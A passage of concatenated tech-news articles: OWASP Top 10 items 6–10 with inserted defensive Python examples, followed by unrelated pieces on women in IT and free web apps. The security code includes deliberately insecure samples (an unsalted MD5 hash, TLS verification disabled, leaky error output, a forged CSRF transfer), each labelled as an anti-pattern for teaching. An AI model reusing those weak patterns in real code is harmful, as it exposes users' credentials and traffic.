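    print(handle_transfer(sid, {"to": "attacker", "amount": "1000"}))
    # What the site's own form sends.
    token = SESSIONS[sid]["csrf"]
    print(handle_transfer(sid, {"to": "bob", "amount": "5", "csrf": token}))
```

Note that the token is bound to the session, not to the user: logging out and back in issues a fresh one, and a token leaked from one session is useless in another.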

6. Information leakage and improper error handling

The problem: Error messages that applications generate and display to users are useful to hackers when they violate privacy or unintentionally leak information about the program's configuration and internal workings.

"Web applications will often leak information about their internal state through detailed or debug error messages. Often, this information can be leveraged to launch or even automate more powerful attacks," OWASP says.

Real-world example: Information leakage goes well beyond error handling, applying also to breaches occurring when confidential data is left in plain sight. The ChoicePoint debacle in early 2005 thus falls somewhere in this category. The records of 163,000 consumers were compromised after criminals pretending to be legitimate ChoicePoint customers sought details about individuals listed in the company's database of personal information. ChoicePoint subsequently limited its sales of information products containing sensitive data.

How to protect users: Use a testing tool such as OWASP's WebScarab Project to see what errors your application generates. "Applications that have not been tested in this way will almost certainly generate unexpected error output," OWASP writes.

Another tip: disable or limit detailed error handling, and don't display debug information to users.
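An added Python example (not from the article or from OWASP) of what "don't display debug information to users" looks like in a request handler: the leaky version echoes the exception text, which can carry paths, SQL, host names or credentials; the safe version logs the full traceback server-side under a reference id and shows the user only that id. The failing lookup and its message are constructed for the demonstration, and `login_message` shows the related leak of confirming which usernames exist.

```python
import logging
import secrets
import traceback

log = logging.getLogger("app")


class UserFacingError(Exception):
    """Errors whose message was written for the user and is safe to show."""


def failing_lookup():
    # Constructed failure: a library error whose text carries a secret.
    raise KeyError("db password is hunter2")


def leaky_handler(handler):
    """The anti-pattern: whatever the exception says goes to the browser."""
    try:
        return 200, handler()
    except Exception as exc:
        return 500, f"{type(exc).__name__}: {exc}"


def safe_handler(handler, debug=False):
    """The user gets a generic message plus a reference id; the full
    traceback goes only to the server log under that id."""
    try:
        return 200, handler()
    except UserFacingError as exc:
        return 400, str(exc)
    except Exception:
        ref = secrets.token_hex(8)
        detail = traceback.format_exc()
        log.error("ref=%s\n%s", ref, detail)
        if debug:  # developer workstation only, never in production
            return 500, detail
        return 500, f"Something went wrong. Quote reference {ref} to support."


def login_message(user_exists, password_ok):
    """Same answer whether the account is unknown or the password is wrong,
    so the login form does not become a username enumeration oracle."""
    if user_exists and password_ok:
        return "Welcome"
    return "Invalid username or password"


if __name__ == "__main__":
    print(leaky_handler(failing_lookup))
    print(safe_handler(failing_lookup))
```

The reference id is what lets support staff find the real stack trace without the trace ever leaving the server; a single `debug` flag that defaults to off is easier to audit than scattered `print` calls.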

7. Broken authentication and session management

The problem: User and administrative accounts can be hijacked when applications fail to protect credentials and session tokens from beginning to end. Watch out for privacy violations and the undermining of authorization and accountability controls.

"Flaws in the main authentication mechanism are not uncommon, but weaknesses are more often introduced through ancillary authentication functions such as logout, password management, timeouts, remember me, secret question and account update," OWASP writes.

Real-world example: In 2002 Microsoft had to eliminate a vulnerability in Hotmail that could have let malicious JavaScript programmers steal user passwords. Reported by a networking products reseller, the flaw could be triggered by e-mails containing Trojan code that altered the Hotmail user interface, forcing users to repeatedly reenter their passwords and unwittingly send them to hackers.

How to protect users: Communication and credential storage have to be secure. SSL, the protocol for transmitting private documents over the Web, should be the only option for authenticated parts of the application, and credentials should be stored in hashed or encrypted form.

Another tip: get rid of custom cookies used for authentication or session management.
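The "ancillary" functions OWASP names (logout, timeouts, remember me) are where a session store usually goes wrong, so here is an added Python example (not from the article or from OWASP) of a minimal store that gets them right: ids from the OS random generator, a fresh id issued at login so a pre-login id cannot be fixated, idle and absolute timeouts, logout that actually destroys the session, and a cookie with the `Secure` and `HttpOnly` flags. The timeout values and the injectable clock are choices made for the demonstration.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60        # seconds without a request before the session dies
ABSOLUTE_TIMEOUT = 8 * 3600   # hard lifetime regardless of activity


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock        # injectable so tests can move time forward
        self._sessions = {}

    def create(self, username=None):
        now = self._clock()
        sid = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"user": username, "created": now, "last": now}
        return sid

    def login(self, old_sid, username):
        """Issue a brand-new id on authentication, so an id the attacker
        planted or observed before login (session fixation) is worthless."""
        self._sessions.pop(old_sid, None)
        return self.create(username)

    def get_user(self, sid):
        """Validate on every request: unknown, idle or expired ids return
        None and are removed, otherwise the idle clock is refreshed."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self._clock()
        if now - s["last"] > IDLE_TIMEOUT or now - s["created"] > ABSOLUTE_TIMEOUT:
            del self._sessions[sid]
            return None
        s["last"] = now
        return s["user"]

    def logout(self, sid):
        """Server-side invalidation; clearing the cookie alone is not logout."""
        self._sessions.pop(sid, None)


def session_cookie_header(sid):
    """Secure: only over SSL. HttpOnly: unreadable to injected script."""
    return f"Set-Cookie: sid={sid}; Secure; HttpOnly; Path=/"


if __name__ == "__main__":
    store = SessionStore()
    anon = store.create()
    sid = store.login(anon, "alice")
    print(session_cookie_header(sid))
    print("old id still valid?", store.get_user(anon) is not None)  # False
```

Keeping the session state on the server and sending the browser nothing but an opaque id is what makes all of these controls possible; a custom cookie that encodes the username or role cannot be expired, rotated or revoked in the same way.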

8. Insecure cryptographic storage

The problem: Many Web developers fail to encrypt sensitive data in storage, even though cryptography is a key part of most Web applications. Even when encryption is present, it's often poorly designed, using inappropriate ciphers.

"These flaws can lead to disclosure of sensitive data and compliance violations," OWASP writes.

Real-world example: The TJX data breach, which exposed 45.7 million credit and debit card numbers. A Canadian government investigation faulted TJX for failing to upgrade its data encryption system before it was targeted by electronic eavesdropping starting in July 2005.

How to protect users: Generate keys offline, and never transmit private keys over insecure channels.

It's pretty common to store credit card numbers these days, but with a Payment Card Industry Data Security Standard (https://www.pcisecuritystandards.org/) compliance deadline coming next year, OWASP says it's easier to stop storing the numbers altogether.
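An added Python example (not the article's or OWASP's code) of the two storage decisions this item comes down to: passwords are stored as a salted, deliberately slow hash rather than an unsalted fast digest, and card numbers are not stored at all beyond the last four digits. `PBKDF2_ROUNDS`, the record format and the sample inputs are choices made for the demonstration; the weak variant is included only to show why two users with the same password must not produce the same stored value.

```python
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 200_000   # raise as hardware gets faster


def weak_hash(password):
    """What not to do: unsalted, fast digest. Two users with the same
    password get the same hash, and a precomputed table reverses it."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password):
    """Per-user random salt plus a deliberately slow key derivation; the
    stored string carries everything needed to verify later."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ROUNDS, salt.hex(), digest.hex())


def verify_password(password, stored):
    algo, rounds, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(rounds))
    # constant-time comparison, so timing does not reveal how many bytes matched
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def card_record(pan):
    """Keep only what the business needs to display. Not storing the full
    PAN takes it out of the scope of the PCI storage rules entirely."""
    digits = "".join(ch for ch in pan if ch.isdigit())
    if not 13 <= len(digits) <= 19:
        raise ValueError("not a card number")
    return {"last4": digits[-4:]}


if __name__ == "__main__":
    stored = hash_password("correct horse")
    print(stored)
    print(verify_password("correct horse", stored), verify_password("wrong", stored))
    print(card_record("4111 1111 1111 1111"))
```

The round count is stored with the hash so it can be raised later without invalidating existing records; old entries are simply re-hashed the next time the user logs in.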

9. Insecure communications

The problem: Similar to No. 8, this is a failure to encrypt network traffic when it's necessary to protect sensitive communications. Attackers can access unprotected conversations, including transmissions of credentials and sensitive information. For this reason, PCI standards require encryption of credit card information transmitted over the Internet.

Real-world example: TJX again. Investigators believe hackers used a telescope-shaped antenna and laptop computer to steal data exchanged wirelessly between portable price-checking devices, cash registers and store computers, the Wall Street Journal reported.

"The $17.4-billion retailer's wireless network had less security than many people have on their home networks," the Journal wrote. TJX was using WEP encryption rather than the more robust WPA.

How to protect users: Use SSL on any authenticated connection or during the transmission of sensitive data, such as user credentials, credit card details, health records and other private information. SSL or a similar encryption protocol should also be applied to client, partner, staff and administrative access to online systems. Use transport layer security or protocol level encryption to protect communications between parts of your infrastructure, such as Web servers and database systems.
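As an added example (not from the article or from OWASP), the Python below shows the client-side half of "use SSL" with the standard `ssl` module: the configuration that only checks whether a connection succeeds, next to one that verifies the certificate chain and hostname and refuses anything older than TLS 1.2, plus a guard that deploy scripts can run to catch a context that has silently turned verification off. The function and parameter names are the example's own.

```python
import socket
import ssl


def insecure_context():
    """The configuration that makes 'it connects' the only test: no chain
    verification and no hostname check, so anything interposed on the path
    can present any certificate and read the traffic."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False      # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_context(cafile=None):
    """Verifies the server chain against the system (or given) CA bundle,
    checks the hostname, and refuses anything older than TLS 1.2."""
    ctx = ssl.create_default_context(cafile=cafile)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def context_is_acceptable(ctx):
    """Guard for deploy scripts and tests: refuse to start with a context
    that disabled verification or allows old protocol versions."""
    return (ctx.verify_mode == ssl.CERT_REQUIRED
            and ctx.check_hostname
            and ctx.minimum_version >= ssl.TLSVersion.TLSv1_2)


def open_verified_socket(host, port=443, cafile=None):
    """Wrap a TCP connection; raises ssl.SSLCertVerificationError when the
    chain or hostname does not check out instead of silently proceeding."""
    ctx = hardened_context(cafile)
    if not context_is_acceptable(ctx):
        raise RuntimeError("refusing to connect with a weakened TLS context")
    return ctx.wrap_socket(socket.create_connection((host, port)),
                           server_hostname=host)


if __name__ == "__main__":
    print("insecure acceptable?", context_is_acceptable(insecure_context()))  # False
    print("hardened acceptable?", context_is_acceptable(hardened_context()))  # True
```

The same `hardened_context` can be handed to database drivers and internal HTTP clients, which is how the last sentence of the advice (encrypting traffic between Web servers and database systems) is applied without a second code path.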

10. Failure to restrict URL access

The problem: Some Web pages are supposed to be restricted to a small subset of privileged users, such as administrators. Yet often there's no real protection of these pages, and hackers can find the URLs by making educated guesses. Say a URL refers to an ID number such as "123456." A hacker might say 'I wonder what's in 123457?' Williams says.

The attacks targeting this vulnerability are called forced browsing, "which encompasses guessing links and brute force techniques to find unprotected pages," OWASP says.

Real-world example: A hole on the Macworld Conference & Expo Web site this year let users get "Platinum" passes worth nearly $1,700, and special access to a Steve Jobs keynote speech, for free. The flaw was code that evaluated privileges in JavaScript on the client but not on the server, so anyone who manipulated that client-side check in the browser could grab a free pass, and the server never re-checked.

How to protect users: Don't assume users will be unaware of hidden URLs. All URLs and business functions should be protected by an effective access control mechanism that verifies the user's role and privileges. "Make sure this is done ... every step of the way, not just once towards the beginning of any multistep process," OWASP advises.
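An added Python example (not the article's, OWASP's or the Macworld site's code) of both halves of that advice: a route table in which every URL, including the admin ones nobody links to, is listed with the roles allowed to reach it (an unlisted URL is denied, so "hidden" never means "open"), and a multi-step purchase in which the price is recomputed from server-side state at the final step rather than taken from anything the browser posts back. The routes, accounts, pass prices and comp code are constructed for the demonstration.

```python
# Constructed route table: every URL, including the admin ones nobody links
# to, is listed with the roles allowed to reach it. A URL missing from the
# table is denied, so "hidden" is never "open".
ROUTES = {
    "/": {"anonymous", "customer", "admin"},
    "/account": {"customer", "admin"},
    "/admin/reports": {"admin"},
    "/admin/users": {"admin"},
}

USERS = {"alice": "customer", "root": "admin"}   # constructed accounts


def role_of(session):
    """Role comes from the server's record of the session, never from a
    parameter or cookie the client can edit."""
    return USERS.get(session.get("user"), "anonymous")


def authorize(session, path):
    """Runs in front of every handler. Returns 200 to proceed, else 403."""
    allowed = ROUTES.get(path)
    if allowed is None or role_of(session) not in allowed:
        return 403
    return 200


# Multi-step purchase. Prices and the discount rule live on the server and
# are re-evaluated at the last step; nothing the browser posts is trusted.
PASS_PRICES = {"platinum": 1700, "expo_only": 0}   # constructed figures
VALID_CODES = {"SPEAKER-XYZ": "platinum"}          # hypothetical comp code


def choose_pass(session, pass_type):
    if pass_type not in PASS_PRICES:
        raise ValueError("unknown pass type")
    session["pass"] = pass_type


def apply_code(session, code):
    # Step two only records the code; whether it is honoured is decided at
    # checkout, from the server's own table, not by JavaScript on the page.
    session["code"] = code


def checkout_total(session, client_claimed_total):
    """Final step: the total is recomputed from server-side state. The value
    the client posts back is compared for tamper detection but never used."""
    base = PASS_PRICES[session["pass"]]
    comped = VALID_CODES.get(session.get("code")) == session["pass"]
    total = 0 if comped else base
    return {"total": total, "tampered": client_claimed_total != total}


if __name__ == "__main__":
    s = {"user": "alice"}
    print(authorize(s, "/admin/reports"))          # 403
    choose_pass(s, "platinum")
    apply_code(s, "FREE-PLEASE")
    print(checkout_total(s, client_claimed_total=0))  # total 1700, tampered
```

The access check and the price check are the same idea at two levels: the client's request is only ever a claim, and the server answers from state it controls.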



U.S. faces competitive disadvantage from lack of women in IT

In both academic and business settings, women in high-tech fields lag far behind their male counterparts in numbers and clout

Discrimination against women and minorities is putting the U.S. at a disadvantage in technology innovation, according to the chancellor of the University of California at Berkeley.

Robert Birgeneau said of the top 50 university computer science department jobs in the U.S., not one is held by a woman of color. "How embarrassing," he said. "It's an astounding waste of talent in an increasingly competitive world."

Birgeneau was the keynote speaker at a workshop on women in technology as part of the Emerging Technologies Conference being held at MIT this week.

He said that while the number of women and men enrolling in undergraduate and post graduate technology programs has evened out somewhat, women are far behind their male counterparts when it comes to academic positions.

Birgeneau cited a study released last fall by The National Academies titled "Beyond Bias and Barriers: Fulfilling the Potential of Women in Academic Science and Engineering." The study said that at the top research institutions, only 15.4 percent of the full professors in the social and behavioral sciences and 14.8 percent in the life sciences are women, "and these are the only fields in science and engineering where the proportion of women reaches into the double digits."

The study also showed that women will likely face discrimination in every field of science and engineering. "We're at a drastic disadvantage in the United States, which is outsourcing to other countries like India and China, who are working madly to compete with us and who are investing deeply in education," he said.

Karen Vogel, founder of The Women's Congress, a women's business-to-business conference, said one factor contributing to the lack of advancement for women in technology jobs and faculty positions is that women often don't support other women when it comes to workplace advancement. Not everyone agreed.

Ilene Lang, president of Catalyst, a New York-based nonprofit corporate research and advisory organization, said during a conference session on workplace culture that preliminary data from an online survey of U.S.-based corporate women found barriers to advancement mostly include a lack of role models, too few corporate leaders who would champion women, and little access to business networks that could plug them into corporate decision-makers.

The survey included two groups of women: Those working in nontechnical roles in high-tech companies and those working in technology positions in companies other than high-tech.

Lang said that the same barriers come up year after year in Catalyst's surveys. "One of the key problems women raise is that they do not get direct feedback on how they can improve. Feedback is always indirect and dances around the edges," she said.

She said there weren't major differences in the results between the two groups of women that made up the 471 respondents in the survey, "except women in technology roles said they intended to stay in their roles longer." The detailed survey results are due out some time next spring, Lang said.

Some women at the conference spoke about their personal experiences with discrimination, including a lack of women in high-level managerial and executive positions.

Ying Li, general manager of applied research and data mining at Microsoft, said during a panel discussion that there are few women who are senior technical leaders at her company.

Claudia Bauzer Medeiros, who was the first woman professor of computer science at the University of Campinas in Sao Paulo, Brazil, said she was able to advance in her career because she never thought of herself as a woman when it came to her job.

"If you start thinking of yourself as a minority, then you start getting a complex about it," she said.

By Lucas Mearian, Computerworld, IDG News Service

Five free Web apps we can't live without

September 27, 2007 (Computerworld) The current explosion of AJAX-powered Web sites has helped spawn countless next-generation Web apps offering everything from simple to-do lists to complex project management, not to mention the ability to share all kinds of things -- documents, calendar listings, photos, video and more.

But with so many sites out there and new ones cropping up almost daily, who's got time to try them all? Playing with dozens of Web apps to find ones you like can sort of defeat the purpose of many of these services: to boost your productivity.

Fortunately for you, we've already done a lot of this work. In the collaborative Web 2.0 spirit, we're sharing some of the favorite tools we use here at Computerworld. Even with their occasional flaws, we just can't stop using them.

From a simple to-do list to a robust drag-and-drop database builder, here are the ones we've found to be borderline addictive. (But we know we might have missed some, and hope you'll post your favorites -- with URLs -- in the comments area below.)




Ta-da List

Any application has to balance the urge to offer lots of functionality with the need for an easy-to-use interface. But that's especially true for Web-based apps, where software bloat can be especially annoying because of slow connections and server wait times, and where users expect to point and click without having to read a 100-page manual first.

You'd be hard pressed to find a more streamlined, simple service than Ta-da List, which bills itself as "the Web's easiest to-do list tool." After opening an account, click "create a new list," name it, type in a task and click "add this item." Add more items by typing them in. Order the items by clicking on "reorder" and dragging items up or down.

Done rearranging? Click "I'm done reordering." When a task is completed, click the box next to it to move it down to the bottom. Edit or delete items (or the list itself) by selecting the edit link.

That's pretty much it. There are no categories, no tags, no priority numbers. I typically use it when I've got a couple of different things in the works that I want to make sure I remember. It's simple, elegant and very quick -- easy enough to replace jotting down a list on a piece of paper, but with a cool AJAX interface.

And unlike a paper list, my Ta-da list is available anywhere I can get online; I can't misplace it. I can also share it with others, either for viewing only or as a group collaborative list. While there are Google ads on the site, they're fairly innocuous and don't feel intrusive while I'm using my list.

Ta-da List was created by 37signals, the company best known for the Basecamp project management service that spawned David Heinemeier Hansson's open-source Ruby on Rails project. Hansson is adamant about keeping all his software lean, and nowhere is that more true than in Ta-da List.

If you must have more functionality in a to-do list, our sister site PCWorld.com recommends RememberTheMilk as a reinvented to-do list "in a snazzy interface that lets you make lists in configurable categories, all laid out on the front page as tabs." I agree that "adding to-dos is easy, though adding deadlines, notes and time estimates is unintuitive." Overall, RememberTheMilk seems like a bit too much work for what I'd get out of it, but for those who place a higher value on functionality than on elegance and simplicity, it's worth a look.

PBwiki

Besides giving us the Web's most famous encyclopedia, wikis offer a handy tool for many other types of informal group collaboration. A lot of open-source projects use wikis to share technical information with their users as well as among developers. While there are plenty of free wiki software packages you can download and install, in-house installation also means in-house update, patching and support.

Initially recommended to our editorial team by one of our Web developers, PBwiki has turned out to be a useful tool to share information and advice about stories in the works and future story ideas. The site claims you can "use PBwiki to make a free wiki as easily as a peanut butter sandwich," and that's pretty much accurate. And once the wiki is set up, adding pages or text to it is quicker and easier than logging into a more structured format.

PBwiki offers ad-supported free wikis as well as paid, ad-free accounts. Wikis can be public or private/shared. You can add widgets (such as basic spreadsheets, chat, Google maps or videos), with additional functionality for paid accounts. All accounts can see revision updates and changes on the site and track changes via e-mail notification. Business accounts also offer different levels of access per user, the ability to make certain pages read-only and page-level RSS feeds.

Of course, there are drawbacks to free-form data as opposed to more structured formats; you can't really query or sort a text blob. There is a basic search box in a PBwiki, but searching for "Machlis" across many wiki pages can't give you the same targeted results as, say, querying a database for "all stories by author Machlis in the last three months."

Still, if you don't expect a wiki to do the job of a spreadsheet or a database, PBwiki can be a useful addition to your information management arsenal.

Google Docs

Yes, yes, I know: "Don't be evil" Google threatens to become the ubiquitous do-exactly-that Web empire, amassing too much information about individuals and too much power over what was supposed to be an egalitarian medium. Do we really want Google taking over our most-used applications, too? Perhaps not, but I can't help but like Google Docs.

Our recent review of four online office suites found that Google's offering lacked some important features such as spreadsheet charts. Unlike some, though, I'm not seeking to replace my desktop word processor or Microsoft Excel (by far my favorite spreadsheet). Instead, I see a good online suite as adding features such as file-sharing or online backup to my existing text editors and spreadsheet app.

Google Docs offers an easy way to work on documents at home, at the office and elsewhere, without having to e-mail files around. I keep some simple documents in Google Docs and download backups to my own PC. When I want the power-user functions of Word or Excel, I can work in those packages, upload the file to Google Docs and then download again to my next system before starting to work again. It's a version control system for documents and spreadsheets.

I often use Google Docs to keep my own "cheat sheets" for various applications and technologies, so I can remember instructions for coding I'll likely need in the future. It's useful to be able to add something I've suddenly figured out about, say, Ruby on Rails, whether I'm coding at home or at the office, without having to remember to add the information to a document residing on another machine.

In fact, I'm writing this story now in a Google Doc document. I don't need slick formatting, headers and scripts; basic writing, HTML coding and spell-check work just fine. However, when it comes time to turn it in, I'll be downloading it to my own system, saving it as a Word doc and e-mailing the file to my editor, since she's partial to Word's "track changes" function, which I must admit is more elegant than Google Docs' "compare revisions."

Still, comparing revisions is a nice function to have, along with some formatting, quick-link additions and sharing. And I've got a backup copy somewhere I can easily access if I want to make changes at home and then e-mail a new file.

Google's spreadsheet definitely isn't powerful enough for some of my projects. (A personal task analyzing local pedestrian accidents had too much data, for example.) However, it's fine for moderate strength tracking needs and superior when I want multiple users adding fairly simple data to a sheet. It's baffling that Microsoft hasn't jumped into the business of offering a Web platform for easily sharing Excel documents, although others such as eXpresso Corp. are trying to get into that business.

Meanwhile, I'm finding Google Docs a nice backup and version-control server for important and useful but not terribly private or sensitive documents.

Bloglines v3 beta

There are loads of RSS readers out there, including worthy entries like NewsGator and Google Reader, as well as some with Web 2.0 interfaces on steroids, such as Pageflakes.

But over the years, I kept returning to Bloglines, despite its aging Web 1.0 interface, because it did what I wanted done with a minimum of fuss. Finally, though, the new Bloglines v3 beta offers an updated UI with a start page and some drag-and-drop ordering that brings the RSS service into the modern era.

My goal in reading RSS feeds isn't to recreate a full, rich-media Web experience. If I wanted that, I'd be surfing directly to source sites. Instead, I want to scan headlines and summaries. I don't want to play around with a lot of buttons, links and options; I'm looking for information.

I want simple ways to subscribe to feeds and see what's new, with some basic feed organization tools. I want to be able to import and export OPML (a way to save a collection of feed subscriptions). And being able to "clip" and save individual stories is nice.

The beta was pretty limited when I started testing, without even a way to mark posts as still unread (that's since been addressed with a "pin" function). I'm still awaiting the "clippings" (keep and save some items) and "publish" (mark items to put in a new RSS feed you can make public) options, but the Bloglines beta help pages assure such functions are on the way.

The start page shows you summaries of headlines when you hover over the item, an AJAX standard that's just coming to Bloglines, and lets you easily add, delete and rearrange components.

The only major annoyance so far is that when I click on links from my start page, I just get a Bloglines summary pop-up instead of going to the source site; for that, I've got to move my mouse over to the pop-up window and click a second time. I'd prefer a summary when hovering but a link when I click.

Overall, though, it's looking like the Bloglines update will refresh but not mess with the basic functionalities that have won the service a place near the top of my browser bookmarks.

Zoho Creator

Unlike word processors or wikis, I haven't seen a flood of free Web sites for building database-driven applications. The few other database entries I'd tried were generally either limited, expensive or cumbersome. But not Zoho Creator.

Zoho Creator sports a surprisingly easy interface for creating your own apps -- even those that include some table joins (that is, looking up information in one table for use in another, which puts the "relational" in relational databases). With a few drag-and-drops, I quickly created data entry forms with text fields, drop-down lists, text boxes and so on.

My test applications ranged from simple (tracking charitable contributions) to complex (story tracking by writer, editor and status), and all ended up doing pretty much what I wanted.

One database collects all Computerworld product reviews published this year. You can see the live interactive database below. Sort by any of the available columns by clicking on the column header (clicking the same header toggles between ascending and descending sort). Click on the search box, and you'll see options to search by product name as well as headline and date.

There's a drag-and-drop option for adding a "lookup" field that pulls selections from another table. It's likewise fairly easy to set up different views of your data, and user-by-user access to each view and form. Creator also offers drag-and-drop scripting, allowing such things as setting defaults or variables based on certain conditions, sending out autogenerated e-mails when a field is changed in a specific way, or validating user input.

For more sophisticated scripting, it's easy to click back and forth between drag-and-drop scripting and the actual code. And I quickly downloaded data from Zoho Creator onto my own system for backup in varying formats, such as comma-separated or XLS spreadsheet format (although, alas, not in SQL) -- a must for any Web-based application where I'm storing important data.

I showed some of my colleagues the sample story-tracking app I put together on Creator, and response was highly favorable. I can think of many real-world uses for Creator, from detailed story tracking in our newsroom to keeping the list of who's slated to buy Friday morning donuts (making it simple to see who hasn't bought their share and even set up automated e-mail notifications when the list is changed). If you're a fan of structured data on the Web, both available to the public at large and shared with a select list of friends or colleagues, Zoho Creator is definitely worth a look.

Be aware that if you're a true database geek, Zoho Creator isn't a replacement for coding your own database app with something like PHP, Python or Ruby, and MySQL or PostgreSQL. Page layouts are limited (there are two, with no style customizations), and you can't do everything with variables, conditional scripting or sophisticated table joins that you can when coding from scratch. (I was told, for example, that I couldn't use a variable value as part of the name of my view.)

You can embed Zoho Creator applications in your own Web pages, although if you decide to use the apps at Zoho.com, you can't do things such as redirect users to a specific view after they've filled out a form. (They just get a message saying data was successfully submitted, followed by a new blank form.)

I find it occasionally frustrating that Zoho Creator uses its own scripting language, Deluge, requiring yet another new syntax to learn if I want to build functionality that goes beyond drag-and-drop offerings. For example, while it's easy to set up autogenerated mail to a specific hard-coded e-mail address, it took me several hours of poking around and document reading to figure out how to do so based on varying conditions. There's some documentation on Deluge at zoho.com but not too many other places to turn. (Note: Power users might want to check out a blog started recently by several Zoho Creator users, Land of ZC.)

And while most of the application is intuitive, some things are not, such as how to store a "collection" of records and even how to edit existing records (a puzzle shared by several of my colleagues, although easy to use once we found it -- a barely noticeable pencil icon next to records in a view).

Fortunately, though, the Zoho staff is quite responsive about answering questions, even from customers with free accounts. Some of the written responses can be a bit difficult to understand, but they're generally useful. In one case, someone even built me a sample application to demonstrate how to conditionally pull data from one table into another.

Zoho.com has a slew of other offerings, including word processing, spreadsheets, wikis, project management, "notebooks" and Web conferencing, although so far I've stuck with Creator. Many of the other apps, including the Google Docs competitors Zoho Writer and Zoho Sheet, are quite feature-packed, but too much at the expense of elegant UI for my tastes.

Earlier this month, Zoho announced a private beta of Zoho Business, a pay service that will include a companywide administrative console, telephone support and "co-branding." For now, most of the services are free, and the plan is to keep them so for individual use. I expect I'll be building some real apps on the site soon.